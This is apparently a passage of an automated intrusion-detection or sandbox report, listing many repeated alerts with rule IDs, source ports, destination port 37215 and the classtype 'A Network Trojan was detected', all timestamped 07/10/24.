                  SID:2829579
                  Source Port:49530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.151857
                  SID:2835222
                  Source Port:42366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.320404
                  SID:2829579
                  Source Port:47066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.941043
                  SID:2835222
                  Source Port:42940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.458086
                  SID:2835222
                  Source Port:50606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.793732
                  SID:2829579
                  Source Port:42240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.870897
                  SID:2835222
                  Source Port:39288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.866292
                  SID:2835222
                  Source Port:49892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.008729
                  SID:2829579
                  Source Port:43210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828221
                  SID:2829579
                  Source Port:46932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.349048
                  SID:2835222
                  Source Port:38534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.347593
                  SID:2835222
                  Source Port:60916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.181411
                  SID:2829579
                  Source Port:46086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.109187
                  SID:2829579
                  Source Port:51116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.262800
                  SID:2829579
                  Source Port:38540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.893160
                  SID:2829579
                  Source Port:54814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985938
                  SID:2829579
                  Source Port:33478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.817859
                  SID:2835222
                  Source Port:36974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.216142
                  SID:2835222
                  Source Port:39048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.526140
                  SID:2829579
                  Source Port:53582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.960624
                  SID:2835222
                  Source Port:34746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.903843
                  SID:2829579
                  Source Port:33824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.621146
                  SID:2829579
                  Source Port:39304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.829336
                  SID:2829579
                  Source Port:41398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.144985
                  SID:2829579
                  Source Port:53898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.590695
                  SID:2829579
                  Source Port:47518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.402218
                  SID:2829579
                  Source Port:44362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.764270
                  SID:2829579
                  Source Port:50464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.515408
                  SID:2829579
                  Source Port:34490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.437126
                  SID:2835222
                  Source Port:57786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.050369
                  SID:2835222
                  Source Port:38544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.974935
                  SID:2835222
                  Source Port:36318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.561697
                  SID:2835222
                  Source Port:49664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366242
                  SID:2829579
                  Source Port:53010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.154328
                  SID:2829579
                  Source Port:43482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.742007
                  SID:2835222
                  Source Port:49270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.322719
                  SID:2829579
                  Source Port:35058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151316
                  SID:2835222
                  Source Port:36216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840335
                  SID:2829579
                  Source Port:53050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.779854
                  SID:2829579
                  Source Port:57786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.268885
                  SID:2835222
                  Source Port:48458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.513537
                  SID:2835222
                  Source Port:49580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.610519
                  SID:2835222
                  Source Port:55676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.134098
                  SID:2835222
                  Source Port:38318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.747131
                  SID:2835222
                  Source Port:51412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.563321
                  SID:2829579
                  Source Port:49428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.985222
                  SID:2835222
                  Source Port:45812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.926461
                  SID:2829579
                  Source Port:38100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.860013
                  SID:2829579
                  Source Port:58570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.163541
                  SID:2835222
                  Source Port:55428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.642690
                  SID:2829579
                  Source Port:51738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.933284
                  SID:2829579
                  Source Port:57606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.800580
                  SID:2835222
                  Source Port:48404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2829579
                  Source Port:47700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.616249
                  SID:2829579
                  Source Port:45544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.616592
                  SID:2835222
                  Source Port:46540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.646221
                  SID:2829579
                  Source Port:59730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.154105
                  SID:2835222
                  Source Port:49486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.862635
                  SID:2835222
                  Source Port:34058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.419943
                  SID:2829579
                  Source Port:50276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.759020
                  SID:2835222
                  Source Port:35220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2829579
                  Source Port:56596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253247
                  SID:2835222
                  Source Port:55906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.243243
                  SID:2835222
                  Source Port:40096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.540187
                  SID:2835222
                  Source Port:37424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.931726
                  SID:2829579
                  Source Port:49202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875328
                  SID:2829579
                  Source Port:56278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.581833
                  SID:2835222
                  Source Port:37170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.881754
                  SID:2829579
                  Source Port:33768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001576
                  SID:2835222
                  Source Port:50422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.463708
                  SID:2835222
                  Source Port:41574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.482995
                  SID:2835222
                  Source Port:56968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.455347
                  SID:2835222
                  Source Port:54344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.046263
                  SID:2835222
                  Source Port:47730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.066216
                  SID:2829579
                  Source Port:53392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.155297
                  SID:2829579
                  Source Port:49400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.439676
                  SID:2829579
                  Source Port:44320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.750468
                  SID:2835222
                  Source Port:47458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058367
                  SID:2829579
                  Source Port:37314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.489238
                  SID:2829579
                  Source Port:53494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.188754
                  SID:2829579
                  Source Port:37256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.190112
                  SID:2829579
                  Source Port:48682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.808476
                  SID:2835222
                  Source Port:57216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972385
                  SID:2835222
                  Source Port:35210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2835222
                  Source Port:55548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.855642
                  SID:2835222
                  Source Port:52728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.449640
                  SID:2835222
                  Source Port:56192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.172720
                  SID:2829579
                  Source Port:43328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.872806
                  SID:2835222
                  Source Port:49706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.533121
                  SID:2829579
                  Source Port:43808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.412174
                  SID:2829579
                  Source Port:56602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.833709
                  SID:2829579
                  Source Port:35042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.621146
                  SID:2835222
                  Source Port:44894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.432094
                  SID:2835222
                  Source Port:50078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.600235
                  SID:2829579
                  Source Port:56850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.597937
                  SID:2835222
                  Source Port:33578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.198870
                  SID:2829579
                  Source Port:55652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.805912
                  SID:2835222
                  Source Port:38992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.254426
                  SID:2835222
                  Source Port:36910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942697
                  SID:2835222
                  Source Port:53236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2835222
                  Source Port:41726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.048430
                  SID:2829579
                  Source Port:51176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609289
                  SID:2835222
                  Source Port:49984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.615141
                  SID:2835222
                  Source Port:59854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.113927
                  SID:2835222
                  Source Port:38756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.963816
                  SID:2829579
                  Source Port:57762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098599
                  SID:2835222
                  Source Port:46900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.316090
                  SID:2835222
                  Source Port:37502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539411
                  SID:2835222
                  Source Port:49784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.766220
                  SID:2829579
                  Source Port:43096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.353904
                  SID:2835222
                  Source Port:53330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.591904
                  SID:2835222
                  Source Port:57518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.514451
                  SID:2829579
                  Source Port:48312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.768053
                  SID:2835222
                  Source Port:47164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.065687
                  SID:2835222
                  Source Port:33106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.798764
                  SID:2835222
                  Source Port:58912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.424240
                  SID:2835222
                  Source Port:38600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522972
                  SID:2835222
                  Source Port:47102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.406013
                  SID:2829579
                  Source Port:58524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819736
                  SID:2829579
                  Source Port:38038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442446
                  SID:2835222
                  Source Port:59092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.585781
                  SID:2829579
                  Source Port:58658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.197285
                  SID:2835222
                  Source Port:58728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.556328
                  SID:2835222
                  Source Port:58772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.652052
                  SID:2829579
                  Source Port:33414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.784447
                  SID:2835222
                  Source Port:35554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.542157
                  SID:2835222
                  Source Port:52224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.096875
                  SID:2829579
                  Source Port:32922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.070289
                  SID:2835222
                  Source Port:38660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.593962
                  SID:2835222
                  Source Port:44380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.689305
                  SID:2829579
                  Source Port:59390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152800
                  SID:2835222
                  Source Port:58188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300019
                  SID:2835222
                  Source Port:38738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012279
                  SID:2835222
                  Source Port:35264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.516345
                  SID:2829579
                  Source Port:53000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.498788
                  SID:2829579
                  Source Port:39992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595631
                  SID:2835222
                  Source Port:43532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.463564
                  SID:2835222
                  Source Port:39412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.805293
                  SID:2835222
                  Source Port:52818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.861414
                  SID:2835222
                  Source Port:54278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.739373
                  SID:2835222
                  Source Port:32846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.949287
                  SID:2835222
                  Source Port:39080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.593723
                  SID:2829579
                  Source Port:35720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.220659
                  SID:2835222
                  Source Port:39650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.098663
                  SID:2835222
                  Source Port:60604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2835222
                  Source Port:55370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.930240
                  SID:2829579
                  Source Port:59328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.526140
                  SID:2835222
                  Source Port:54476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.454702
                  SID:2829579
                  Source Port:48250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.742603
                  SID:2835222
                  Source Port:44346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.135196
                  SID:2829579
                  Source Port:39902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.499303
                  SID:2835222
                  Source Port:59414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.007312
                  SID:2829579
                  Source Port:34002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641730
                  SID:2829579
                  Source Port:34976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.547528
                  SID:2835222
                  Source Port:51990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.463374
                  SID:2835222
                  Source Port:47912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.193253
                  SID:2829579
                  Source Port:48362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.997758
                  SID:2835222
                  Source Port:37172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.108378
                  SID:2835222
                  Source Port:60738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.454213
                  SID:2835222
                  Source Port:53958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.143446
                  SID:2829579
                  Source Port:44426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537934
                  SID:2829579
                  Source Port:42342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.797705
                  SID:2835222
                  Source Port:51432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.868955
                  SID:2835222
                  Source Port:35956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.952903
                  SID:2829579
                  Source Port:58180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2835222
                  Source Port:33768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850928
                  SID:2835222
                  Source Port:41798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.993407
                  SID:2835222
                  Source Port:59660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.554316
                  SID:2835222
                  Source Port:54870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.824725
                  SID:2835222
                  Source Port:43578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.265032
                  SID:2835222
                  Source Port:60580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.545793
                  SID:2835222
                  Source Port:37152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.969390
                  SID:2835222
                  Source Port:58460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.284664
                  SID:2829579
                  Source Port:49840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.722420
                  SID:2835222
                  Source Port:42742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.369458
                  SID:2829579
                  Source Port:39454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.088464
                  SID:2829579
                  Source Port:36986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655125
                  SID:2835222
                  Source Port:56110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.214564
                  SID:2835222
                  Source Port:42318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603574
                  SID:2835222
                  Source Port:45862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.314456
                  SID:2835222
                  Source Port:54406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.770173
                  SID:2829579
                  Source Port:54974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.457605
                  SID:2835222
                  Source Port:49194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
